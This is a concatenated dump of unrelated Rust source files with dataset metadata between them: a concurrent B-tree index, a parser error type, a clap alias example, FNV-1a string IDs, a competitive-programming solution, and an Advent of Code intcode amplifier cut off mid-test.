K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { /// Creates an empty [`TreeIndex`]. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.read(&1, |_, v| *v).is_none()); /// ``` #[must_use] pub fn new() -> TreeIndex<K, V> { TreeIndex { root: AtomicArc::null(), } } /// Inserts a key-value pair. /// /// # Errors /// /// Returns an error along with the supplied key-value pair if the key exists. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.insert(1, 10).is_ok()); /// assert_eq!(treeindex.insert(1, 11).err().unwrap(), (1, 11)); /// assert_eq!(treeindex.read(&1, |k, v| *v).unwrap(), 10); /// ``` #[inline] pub fn insert(&self, mut key: K, mut value: V) -> Result<(), (K, V)> { let barrier = Barrier::new(); let mut root_ptr = self.root.load(Acquire, &barrier); loop { if let Some(root_ref) = root_ptr.as_ref() { match root_ref.insert(key, value, &barrier) { Ok(_) => return Ok(()), Err(error) => match error { InsertError::Duplicated(entry) => return Err(entry), InsertError::Full(entry) => { root_ref.split_root(&self.root, &barrier); key = entry.0; value = entry.1; } InsertError::Retry(entry) => { std::thread::yield_now(); key = entry.0; value = entry.1; } }, } root_ptr = self.root.load(Acquire, &barrier); continue; } let new_root = Arc::new(Node::new_leaf_node()); match self .root .compare_exchange(root_ptr, (Some(new_root), Tag::None), AcqRel, Acquire) { Ok((_, ptr)) | Err((_, ptr)) => root_ptr = ptr, } } } /// Removes a key-value pair. 
/// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(!treeindex.remove(&1)); /// assert!(treeindex.insert(1, 10).is_ok()); /// assert!(treeindex.remove(&1)); /// ``` #[inline] pub fn remove<Q>(&self, key_ref: &Q) -> bool where K: Borrow<Q>, Q: Ord + ?Sized, { self.remove_if(key_ref, |_| true) } /// Removes a key-value pair if the given condition is met. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.insert(1, 10).is_ok()); /// assert!(!treeindex.remove_if(&1, |v| *v == 0)); /// assert!(treeindex.remove_if(&1, |v| *v == 10)); /// ``` #[inline] pub fn remove_if<Q, F: FnMut(&V) -> bool>(&self, key_ref: &Q, mut condition: F) -> bool where K: Borrow<Q>, Q: Ord + ?Sized, { let mut has_been_removed = false; let barrier = Barrier::new(); let mut root_ptr = self.root.load(Acquire, &barrier); while let Some(root_ref) = root_ptr.as_ref() { match root_ref.remove_if(key_ref, &mut condition, &barrier) { Ok(removed) => return removed || has_been_removed, Err(remove_error) => match remove_error { RemoveError::Empty(removed) => { if removed && !has_been_removed { has_been_removed = true; } if Node::remove_root(&self.root, &barrier) { return has_been_removed; } } RemoveError::Retry(removed) => { std::thread::yield_now(); if removed && !has_been_removed { has_been_removed = true; } } }, }; root_ptr = self.root.load(Acquire, &barrier); } has_been_removed } /// Reads a key-value pair. /// /// It returns `None` if the key does not exist. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.read(&1, |k, v| *v).is_none()); /// assert!(treeindex.insert(1, 10).is_ok()); /// assert_eq!(treeindex.read(&1, |k, v| *v).unwrap(), 10); /// ``` #[inline] pub fn read<Q, R, F: FnOnce(&Q, &V) -> R>(&self, key_ref: &Q, reader: F) -> Option<R> where K: Borrow<Q>, Q: Ord + ?Sized, { let barrier = Barrier::new(); self.read_with(key_ref, reader, &barrier) } /// Reads a key-value pair using the supplied [`Barrier`]. /// /// It enables the caller to use the value reference outside the method. It returns `None` /// if the key does not exist. /// /// # Examples /// /// ``` /// use scc::ebr::Barrier; /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.insert(1, 10).is_ok()); /// /// let barrier = Barrier::new(); /// let value_ref = treeindex.read_with(&1, |k, v| v, &barrier).unwrap(); /// assert_eq!(*value_ref, 10); /// ``` #[inline] pub fn read_with<'b, Q, R, F: FnOnce(&Q, &'b V) -> R>( &self, key_ref: &Q, reader: F, barrier: &'b Barrier, ) -> Option<R> where K: Borrow<Q>, Q: Ord + ?Sized, { let mut root_ptr = self.root.load(Acquire, barrier); while let Some(root_ref) = root_ptr.as_ref() { match root_ref.search(key_ref, barrier) { Ok(result) => { if let Some(value) = result { return Some(reader(key_ref, value)); } return None; } Err(err) => match err { SearchError::Empty => return None, SearchError::Retry => { std::thread::yield_now(); root_ptr = self.root.load(Acquire, barrier); continue; } }, } } None } /// Clears the [`TreeIndex`]. 
/// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// for key in 0..16_u64 { /// assert!(treeindex.insert(key, 10).is_ok()); /// } /// /// treeindex.clear(); /// /// assert_eq!(treeindex.len(), 0); /// ``` #[inline] pub fn clear(&self) { self.root.swap((None, Tag::None), Relaxed); } /// Returns the size of the [`TreeIndex`]. /// /// It internally scans all the leaf nodes, and therefore the time complexity is O(N). /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// for key in 0..16_u64 { /// assert!(treeindex.insert(key, 10).is_ok()); /// } /// /// assert_eq!(treeindex.len(), 16); /// ``` #[inline] pub fn len(&self) -> usize { let barrier = Barrier::new(); self.iter(&barrier).count() } /// Returns `true` if the [`TreeIndex`] is empty. /// /// It internally scans all the leaf nodes, and therefore the time complexity is O(N). /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.is_empty()); /// ``` #[inline] pub fn is_empty(&self) -> bool { self.len() == 0 } /// Returns the depth of the [`TreeIndex`]. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// for key in 0..16_u64 { /// let result = treeindex.insert(key, 10); /// assert!(result.is_ok()); /// } /// /// assert_eq!(treeindex.depth(), 1); /// ``` #[inline] pub fn depth(&self) -> usize { let barrier = Barrier::new(); self.root .load(Acquire, &barrier) .as_ref() .map_or(0, |root_ref| root_ref.depth(1, &barrier)) } /// Returns a [`Visitor`]. /// /// The returned [`Visitor`] starts scanning from the minimum key-value pair. /// /// # Examples /// /// ``` /// use scc::ebr::Barrier; /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.insert(1, 10).is_ok()); /// assert!(treeindex.insert(2, 11).is_ok()); /// assert!(treeindex.insert(3, 13).is_ok()); /// /// let barrier = Barrier::new(); /// /// let mut visitor = treeindex.iter(&barrier); /// assert_eq!(visitor.next().unwrap(), (&1, &10)); /// assert_eq!(visitor.next().unwrap(), (&2, &11)); /// assert_eq!(visitor.next().unwrap(), (&3, &13)); /// assert!(visitor.next().is_none()); /// ``` #[inline] pub fn iter<'t, 'b>(&'t self, barrier: &'b Barrier) -> Visitor<'t, 'b, K, V> { Visitor::new(self, barrier) } /// Returns a [`Range`] that scans keys in the given range. /// /// # Examples /// /// ``` /// use scc::ebr::Barrier; /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// for i in 0..10 { /// assert!(treeindex.insert(i, 10).is_ok()); /// } /// /// let barrier = Barrier::new(); /// /// assert_eq!(treeindex.range(1..1, &barrier).count(), 0); /// assert_eq!(treeindex.range(4..8, &barrier).count(), 4); /// assert_eq!(treeindex.range(4..=8, &barrier).count(), 5); /// ``` #[inline] pub fn range<'t, 'b, R: RangeBounds<K>>( &'t self, range: R, barrier: &'b Barrier, ) -> Range<'t, 'b, K, V, R> { Range::new(self, range, barrier) } } impl<K, V> TreeIndex<K, V> where K: 'static + Clone + fmt::Display + Ord + Send + Sync, V: 'static + Clone + fmt::Display + Send + Sync, { /// Prints the [`TreeIndex`] contents to the given output in the DOT language. /// /// # Errors /// /// An [`io::Error`](std::io::Error) can be returned. 
/// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::new(); /// /// assert!(treeindex.insert(1, 10).is_ok()); /// /// treeindex.print(&mut std::io::stdout()); /// ``` pub fn print<T: std::io::Write>(&self, output: &mut T) -> std::io::Result<()> { output.write_fmt(format_args!("digraph {{\n"))?; let barrier = Barrier::new(); if let Some(root_ref) = self.root.load(Acquire, &barrier).as_ref() { root_ref.print(output, 1, &barrier)?; } output.write_fmt(format_args!("}}")) } } impl<K, V> Default for TreeIndex<K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { /// Creates a [`TreeIndex`] with the default parameters. /// /// # Examples /// /// ``` /// use scc::TreeIndex; /// /// let treeindex: TreeIndex<u64, u32> = TreeIndex::default(); /// /// assert!(treeindex.read(&1, |_, v| *v).is_none()); /// ``` fn default() -> Self { TreeIndex::new() } } /// [`Visitor`] scans all the key-value pairs in the [`TreeIndex`]. /// /// It is guaranteed to visit all the key-value pairs that outlive the [`Visitor`], and it /// scans keys in monotonically increasing order. pub struct Visitor<'t, 'b, K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { tree: &'t TreeIndex<K, V>, leaf_scanner: Option<Scanner<'b, K, V>>, barrier: &'b Barrier, } impl<'t, 'b, K, V> Visitor<'t, 'b, K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { fn new(tree: &'t TreeIndex<K, V>, barrier: &'b Barrier) -> Visitor<'t, 'b, K, V> { Visitor::<'t, 'b, K, V> { tree, leaf_scanner: None, barrier, } } } impl<'t, 'b, K, V> Iterator for Visitor<'t, 'b, K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { type Item = (&'b K, &'b V); fn next(&mut self) -> Option<Self::Item> { // Starts scanning. if self.leaf_scanner.is_none() { loop { let root_ptr = self.tree.root.load(Acquire, self.barrier); if let Some(root_ref) = root_ptr.as_ref() { if let Ok(scanner) = root_ref.min(self.barrier) { self.leaf_scanner.replace(scanner); break; } } else { return None; } } } // Proceeds to the next entry. if let Some(mut scanner) = self.leaf_scanner.take() { let min_allowed_key = scanner.get().map(|(key, _)| key); if let Some(result) = scanner.next() { self.leaf_scanner.replace(scanner); return Some(result); } // Proceeds to the next leaf node. if let Some(new_scanner) = scanner.jump(min_allowed_key, self.barrier) { if let Some(entry) = new_scanner.get() { self.leaf_scanner.replace(new_scanner); return Some(entry); } } } None } } impl<'t, 'b, K, V> FusedIterator for Visitor<'t, 'b, K, V> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, { } /// [`Range`] represents a range of keys in the [`TreeIndex`]. /// /// It is identical to [`Visitor`] except that it does not traverse keys outside of the given /// range. 
pub struct Range<'t, 'b, K, V, R> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, R: 'static + RangeBounds<K>, { tree: &'t TreeIndex<K, V>, leaf_scanner: Option<Scanner<'b, K, V>>, range: R, check_lower_bound: bool, check_upper_bound: bool, barrier: &'b Barrier, } impl<'t, 'b, K, V, R> Range<'t, 'b, K, V, R> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, R: RangeBounds<K>, { fn new(tree: &'t TreeIndex<K, V>, range: R, barrier: &'b Barrier) -> Range<'t, 'b, K, V, R> { Range::<'t, 'b, K, V, R> { tree, leaf_scanner: None, range, check_lower_bound: true, check_upper_bound: false, barrier, } } fn next_unbounded(&mut self) -> Option<(&'b K, &'b V)> { // Starts scanning. if self.leaf_scanner.is_none() { loop { let root_ptr = self.tree.root.load(Acquire, self.barrier); if let Some(root_ref) = root_ptr.as_ref() { let min_allowed_key = match self.range.start_bound() { Excluded(key) | Included(key) => Some(key), Unbounded => { self.check_lower_bound = false; None } }; if let Ok(leaf_scanner) = min_allowed_key.map_or_else( || root_ref.min(self.barrier), |min_allowed_key| root_ref.max_less(min_allowed_key, self.barrier), ) { self.check_upper_bound = match self.range.end_bound() { Excluded(key) => leaf_scanner .max_entry() .map_or(false, |max_entry| max_entry.0.cmp(key) != Ordering::Less), Included(key) => leaf_scanner.max_entry().map_or(false, |max_entry| { max_entry.0.cmp(key) == Ordering::Greater }), Unbounded => false, }; self.leaf_scanner.replace(leaf_scanner); break; } } else { // Empty. return None; } } } // Proceeds to the next entry. if let Some(mut scanner) = self.leaf_scanner.take() { let min_allowed_key = scanner.get().map(|(key, _)| key); if let Some(result) = scanner.next() { self.leaf_scanner.replace(scanner); return Some(result); } // Proceeds to the next leaf node. if let Some(new_scanner) = scanner.jump(min_allowed_key, self.barrier).take() { if let Some(entry) = new_scanner.get() { self.check_upper_bound = match self.range.end_bound() { Excluded(key) => new_scanner .max_entry() .map_or(false, |max_entry| max_entry.0.cmp(key) != Ordering::Less), Included(key) => new_scanner .max_entry() .map_or(false, |max_entry| max_entry.0.cmp(key) == Ordering::Greater), Unbounded => false, }; self.leaf_scanner.replace(new_scanner); return Some(entry); } } } None } } impl<'t, 'b, K, V, R> Iterator for Range<'t, 'b, K, V, R> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, R: RangeBounds<K>, { type Item = (&'b K, &'b V); fn next(&mut self) -> Option<Self::Item> { while let Some((key_ref, value_ref)) = self.next_unbounded() { if self.check_lower_bound { match self.range.start_bound() { Excluded(key) => { if key_ref.cmp(key) != Ordering::Greater { continue; } } Included(key) => { if key_ref.cmp(key) == Ordering::Less { continue; } } Unbounded => (), } } self.check_lower_bound = false; if self.check_upper_bound { match self.range.end_bound() { Excluded(key) => { if key_ref.cmp(key) == Ordering::Less { return Some((key_ref, value_ref)); } } Included(key) => { if key_ref.cmp(key) != Ordering::Greater { return Some((key_ref, value_ref)); } } Unbounded => { return Some((key_ref, value_ref)); } } break; } return Some((key_ref, value_ref)); } None } } impl<'t, 'b, K, V, R> FusedIterator for Range<'t, 'b, K, V, R> where K: 'static + Clone + Ord + Send + Sync, V: 'static + Clone + Send + Sync, R: RangeBounds<K>, { }
true
e2b95d034b5e7e1fdb3eed5fde0199ae11a86d91
Rust
xshade-lang/xshade-parser
/src/error/mod.rs
UTF-8
2,716
3.078125
3
[ "MIT" ]
permissive
use ::std::convert::From; use ::std::error::Error; use ::std::fmt; use ::ast::Span; pub type ParseResult<T> = Result<T, ParseError>; #[derive(Debug, Copy, Clone, Serialize, Deserialize)] pub enum ParseErrorKind { Unknown = 0, UnrecognizedCharacter = 1, InvalidTopLevelItem = 1000, InvalidStructName = 2000, InvalidFunctionName = 3000, MissingArgumentList = 3001, MissingOpenCurlyBraces = 5000, MissingClosingCurlyBraces = 5001, MissingError = 999999, } impl From<u32> for ParseErrorKind { fn from(value: u32) -> Self { match value { 1 => ParseErrorKind::UnrecognizedCharacter, 1000 => ParseErrorKind::InvalidTopLevelItem, 2000 => ParseErrorKind::InvalidStructName, 3000 => ParseErrorKind::InvalidFunctionName, 3001 => ParseErrorKind::MissingArgumentList, 5000 => ParseErrorKind::MissingOpenCurlyBraces, 5001 => ParseErrorKind::MissingClosingCurlyBraces, 999999 => ParseErrorKind::MissingError, _ => ParseErrorKind::Unknown, } } } #[derive(Debug, Serialize, Deserialize)] pub struct ParseError { span: Span, kind: ParseErrorKind, } impl ParseError { pub fn new(span: Span, kind: ParseErrorKind) -> ParseError { ParseError { span, kind, } } } impl Error for ParseError { fn description(&self) -> &str { "ParseError" } fn cause(&self) -> Option<&Error> { None } } impl fmt::Display for ParseError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self.kind { ParseErrorKind::Unknown => write!(f, "ParseError: Unknown error at {}.", self.span), ParseErrorKind::UnrecognizedCharacter => write!(f, "ParseError: Unrecognized character at {}.", self.span), ParseErrorKind::InvalidTopLevelItem => write!(f, "ParseError: Invalid top level item at {}.", self.span), ParseErrorKind::MissingOpenCurlyBraces => write!(f, "ParseError: Missing opening curly braces at {}.", self.span), ParseErrorKind::MissingClosingCurlyBraces => write!(f, "ParseError: Missing closing curly braces at {}.", self.span), ParseErrorKind::InvalidStructName => write!(f, "ParseError: Invalid struct name at {}.", self.span), ParseErrorKind::InvalidFunctionName => write!(f, "ParseError: Invalid function name at {}.", self.span), ParseErrorKind::MissingArgumentList => write!(f, "ParseError: Missing argument list at {}.", self.span), ParseErrorKind::MissingError => write!(f, "ParseError: A custom error is missing in a nom parser."), } } }
true
c31f410dd04fc3b4cd12b8cf48b6bee1ec617e67
Rust
poma/clap
/examples/21_aliases.rs
UTF-8
1,275
3.46875
3
[ "MIT", "Apache-2.0" ]
permissive
use clap::{App, Arg};

fn main() {
    let matches = App::new("MyApp")
        .subcommand(
            App::new("ls")
                .aliases(&["list", "dir"])
                .about("Adds files to myapp")
                .version("0.1")
                .author("Kevin K.")
                .arg(
                    Arg::with_name("input")
                        .help("the file to add")
                        .index(1)
                        .required(true),
                ),
        )
        .get_matches();

    // You can check if a subcommand was used like normal
    // (the subcommand defined above is named "ls", so that is the name to query)
    if matches.is_present("ls") {
        println!("'myapp ls' was run.");
    }

    // You can get the independent subcommand matches (which function exactly like App matches)
    if let Some(ref matches) = matches.subcommand_matches("ls") {
        // Safe to use unwrap() because of the required() option
        println!("Adding file: {}", matches.value_of("input").unwrap());
    }

    // You can also match on a subcommand's name
    match matches.subcommand_name() {
        Some("ls") => println!("'myapp ls' was used"),
        None => println!("No subcommand was used"),
        _ => println!("Some other subcommand was used"),
    }

    // Continued program logic goes here...
}
true
7aa8ff12d2bbaeb9e6549f26947122160c5c4542
Rust
silverweed/ecsde
/inle/inle_common/src/stringid.rs
UTF-8
4,414
2.890625
3
[]
no_license
use std::convert::From; #[cfg(debug_assertions)] use {std::collections::hash_map::Entry, std::collections::HashMap, std::sync::RwLock}; #[derive(PartialEq, Hash, Copy, Clone, PartialOrd, Eq, Ord)] pub struct String_Id(u32); #[cfg(debug_assertions)] lazy_static! { static ref STRING_ID_MAP: RwLock<HashMap<String_Id, String>> = RwLock::new(HashMap::new()); } impl String_Id { pub const fn from_u32(x: u32) -> String_Id { String_Id(x) } pub const fn val(self) -> u32 { self.0 } } impl<'a, T> From<T> for String_Id where &'a str: From<T>, T: 'a, { fn from(s: T) -> String_Id { trace!("String_Id::from"); let s: &str = s.into(); sid_from_str(s) } } #[cfg(debug_assertions)] pub fn sid_from_str(s: &str) -> String_Id { let this = const_sid_from_str(s); { match STRING_ID_MAP .write() .expect("[ ERROR ] Failed to lock STRING_ID_MAP") .entry(this) { Entry::Occupied(o) => { let old = o.get().as_str(); assert_eq!( old, s, "Two strings map to the same SID: {} and {}!", old, s ); } Entry::Vacant(v) => { v.insert(String::from(s)); } } } this } #[cfg(not(debug_assertions))] pub const fn sid_from_str(s: &str) -> String_Id { const_sid_from_str(s) } pub const fn const_sid_from_str(s: &str) -> String_Id { String_Id(fnv1a(s.as_bytes())) } #[macro_export] macro_rules! sid { ($str: expr) => { $crate::stringid::sid_from_str($str) }; } impl std::fmt::Display for String_Id { #[cfg(not(debug_assertions))] fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "{}", self.0) } #[cfg(debug_assertions)] fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!( f, "{}", STRING_ID_MAP .read() .expect("[ ERROR ] Failed to lock STRING_ID_MAP") .get(self) // this may fail if we created the String_Id from an integer directly .unwrap_or(&format!("{}", self.0)) ) } } impl std::fmt::Debug for String_Id { #[cfg(not(debug_assertions))] fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!(f, "String_Id({})", self.0) } #[cfg(debug_assertions)] fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result { write!( f, "String_Id({}, \"{}\")", self.0, STRING_ID_MAP .read() .expect("[ ERROR ] Failed to lock STRING_ID_MAP") .get(self) .map_or("??", |s| s) ) } } pub const FNV1A_PRIME32: u32 = 16_777_619; pub const FNV1A_START32: u32 = 2_166_136_261; const fn fnv1a(bytes: &[u8]) -> u32 { let mut result = FNV1A_START32; let mut i = 0; while i < bytes.len() { let b = bytes[i]; result ^= b as u32; result = result.wrapping_mul(FNV1A_PRIME32); i += 1; } result } #[cfg(test)] mod tests { use super::*; #[test] fn test_fnv1a() { const_assert!(fnv1a(b"A test string") == 943117577); assert_eq!(fnv1a(b"A test string"), 0x3836d509); assert_eq!(fnv1a(b"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor \ incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud \ exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure \ dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. \ Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt \ mollit anim id est laborum."), 0x7c0594dd); } #[test] fn stringid_from_str() { assert_eq!(sid!("A test string"), String_Id(943117577)); assert_eq!(sid!("A test string").0, fnv1a(b"A test string")); } #[test] fn stringid_to_str() { assert_eq!( sid!("Another test string").to_string(), String::from("Another test string") ); } }
true
503011710ba89eeb2667fe15bc2a8d243b957ea7
Rust
binh-vu/semantic-modeling
/gmtk/src/graph_models/domains/int_domain.rs
UTF-8
753
3.125
3
[ "MIT" ]
permissive
use graph_models::traits::Domain;

pub struct IntDomain {
    min: i32,
    max: i32,
}

impl IntDomain {
    pub fn new(min: i32, max: i32) -> IntDomain {
        return IntDomain { min, max }
    }
}

impl Domain for IntDomain {
    type Value = i32;

    fn numel(&self) -> usize {
        (self.max - self.min + 1) as usize
    }

    fn get_index(&self, &value: &<Self as Domain>::Value) -> usize {
        assert!(
            self.min <= value && value <= self.max,
            format!("Invalid value: {} <= {} <= {}", self.min, value, self.max)
        );
        return (value - self.min) as usize;
    }

    fn get_value(&self, index: usize) -> <Self as Domain>::Value {
        assert!(index <= (self.max - self.min) as usize);
        return self.min + index as i32;
    }
}
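// Editor's note: the test module below is an addition, not part of the original file. It is a
// minimal usage sketch for IntDomain, assuming the module layout above (i.e. `super` exposes
// `IntDomain` and the `Domain` trait path is as imported at the top of the file).
#[cfg(test)]
mod int_domain_usage_sketch {
    use super::*;
    use graph_models::traits::Domain;

    #[test]
    fn maps_values_to_indices_and_back() {
        let dom = IntDomain::new(-3, 3); // domain covers -3..=3, i.e. 7 values
        assert_eq!(dom.numel(), 7);
        assert_eq!(dom.get_index(&0), 3); // value 0 sits at index 3
        assert_eq!(dom.get_value(3), 0); // and index 3 maps back to value 0
    }
}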
true
04dcb28bec7efb17dce54e7e2e8338cf16e3854f
Rust
shirvan/fastlyzer
/src/rw.rs
UTF-8
1,222
2.984375
3
[ "Unlicense", "MIT" ]
permissive
use crate::FastResult;
use concat_reader::concat_path;
use std::{
    fs::OpenOptions,
    io::{BufRead, BufReader},
    path::Path,
};

/// Main input interface.
///
/// We wanted to allow users to read a directory or a file without having to choose a different
/// flag for each. This way users don't have to remember multiple flags and if they make a mistake
/// it's easy to adjust the target, for example by adding an extension.
///
/// This function uses the [concat_reader](https://docs.rs/concat-reader/0.1.0/concat_reader/) crate
/// to read all the files in a directory into one buffer.
pub fn reader(file: &str) -> FastResult<Box<dyn BufRead>> {
    let path = Path::new(file);
    if path.is_dir() {
        let paths = path
            .read_dir()
            .into_iter()
            .map(|file| file.map(|f| f.unwrap().path()).collect::<Vec<_>>())
            .flatten()
            .filter(|path| path.is_file())
            .collect::<Vec<_>>();

        let file = concat_path(paths);
        let buff = BufReader::new(file);
        Ok(Box::new(buff))
    } else {
        let file = OpenOptions::new().read(true).open(&path)?;
        let buff = BufReader::new(file);
        Ok(Box::new(buff))
    }
}
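// Editor's note: the function below is an addition, not part of the original fastlyzer source.
// It is a small sketch of how `reader` can be driven for either a file or a directory target;
// error handling is deliberately simplistic because the error half of `FastResult` is not shown
// in the record above.
#[allow(dead_code)]
fn count_lines_sketch(target: &str) -> usize {
    match reader(target) {
        // `reader` hands back a single buffered stream, even when `target` is a directory.
        Ok(buf) => buf.lines().filter_map(|line| line.ok()).count(),
        Err(_) => 0,
    }
}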
true
428544c71a467fbe5581fed8c53c6981a3ba8128
Rust
y-oksaku/Competitive-Programming
/AtCoder/abc/161e_2.rs
UTF-8
1,179
2.546875
3
[]
no_license
#![allow(unused_imports)] #![allow(unused_macros)] #![allow(non_snake_case)] #![allow(dead_code)] #![allow(unused_variables)] #![allow(unused_mut)] #![allow(unused_assignments)] use proconio::input; use proconio::marker::*; use std::collections::*; use std::cmp::*; use std::mem::swap; use std::f64::consts::*; const MOD: u64 = 1000000007; const INF: usize = std::usize::MAX / 4; fn main() { input! { N: usize, K: usize, C: usize, S: Chars, } let mut L = vec![0; N + 1]; let mut R = vec![0; N + 1]; let mut now = 1; while now <= N { if S[now - 1] == 'o' { L[now] += 1; now += C + 1; } else { now += 1; } } for i in 0..N { L[i + 1] += L[i]; } now = 1; while now <= N { if S[N - now] == 'o' { R[N - now] += 1; now += C + 1; } else { now += 1; } } for i in (0..N).rev() { R[i] += R[i + 1]; } for i in 1..N+1 { if S[i - 1] == 'o' && L[i] + R[i] == K && L[i] != L[i - 1] && R[i] != R[i - 1] { println!("{}", i); } } }
true
edb48e1fe69724e183e47937500776ca2a60795e
Rust
mgw854/adventofcode2019
/src/day7/mod.rs
UTF-8
8,747
2.78125
3
[]
no_license
use super::intcode_8086::{Intcode8086}; use bus::BusReader; pub struct Amplifier { processor: Intcode8086, pub output: BusReader<i32> } impl Amplifier { pub fn create(phase_setting: u8, input_signal: i32, mut cpu: Intcode8086, mut input: BusReader<i32>) -> Amplifier { let cpu_input : crossbeam_channel::Sender<i32> = cpu.get_input_port(); cpu_input.send(phase_setting as i32).expect("Sending a phase signal should not fail"); cpu_input.send(input_signal).expect("Sending an input signal should not fail"); std::thread::spawn(move || { loop { match input.recv() { Ok(x) => match cpu_input.send(x) { Err(e) => break, _ => continue }, Err(e) => { break; } }; } }); let output = cpu.get_output_port(); Amplifier { processor: cpu, output: output } } pub fn create_no_value(phase_setting: u8, mut cpu: Intcode8086, mut input: BusReader<i32>) -> Amplifier { let cpu_input : crossbeam_channel::Sender<i32> = cpu.get_input_port(); cpu_input.send(phase_setting as i32).expect("Sending a phase signal should not fail"); std::thread::spawn(move || { loop { match input.recv() { Ok(x) => cpu_input.send(x).expect("Send shouldn't fail (nv)"), Err(e) => { break; } }; } }); let output = cpu.get_output_port(); Amplifier { processor: cpu, output: output } } } pub fn phase_setting_generator() -> Vec<Vec<u8>> { let mut results = Vec::new(); for i in 5..=9 { for j in 5..=9 { if i == j { continue; } for k in 5..=9 { if i == k || j == k { continue; } for l in 5..=9 { if i == l || j == l || k == l { continue; } for m in 5..=9 { if i == m || j == m || k == m || l == m { continue; } results.push(vec![i, j, k, l, m]); } } } } } results } impl Amplifier { pub fn run(self) -> std::thread::JoinHandle<Intcode8086> { self.processor.process() } } #[cfg(test)] mod tests { use super::*; fn parse_csv(input: &str) -> Vec<i32> { input .split(",") .map(|s| s.trim()) .map(|s| s.parse::<i32>().unwrap()) .collect() } #[test] fn given_input_part1_1() { let instructions = "3,15,3,16,1002,16,10,16,1,16,15,15,4,15,99,0,0"; let mut cpu0 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu1 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu2 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu3 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu4 = Intcode8086::initialize(parse_csv(instructions)); let io0 = cpu0.get_output_port(); let io1 = cpu1.get_output_port(); let io2 = cpu2.get_output_port(); let io3 = cpu3.get_output_port(); let io4 = cpu4.get_output_port(); let mut output : BusReader<i32> = cpu4.get_output_port(); let amp0 = Amplifier::create(4, 0, cpu0, io4); let amp1 = Amplifier::create_no_value(3, cpu1, io0); let amp2 = Amplifier::create_no_value(2, cpu2, io1); let amp3 = Amplifier::create_no_value(1, cpu3, io2); let amp4 = Amplifier::create_no_value(0, cpu4, io3); amp0.run(); amp1.run(); amp2.run(); amp3.run(); amp4.run().join(); let mut max = 0; loop { match output.recv() { Ok(v) => max = v, Err(e) => break }; } assert_eq!(max, 43210); } #[test] fn given_input_part1_2() { let instructions = "3,23,3,24,1002,24,10,24,1002,23,-1,23,101,5,23,23,1,24,23,23,4,23,99,0,0"; let mut cpu0 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu1 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu2 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu3 = Intcode8086::initialize(parse_csv(instructions)); let mut cpu4 = Intcode8086::initialize(parse_csv(instructions)); let io0 = cpu0.get_output_port(); let io1 = cpu1.get_output_port(); let io2 = cpu2.get_output_port(); let io3 = 
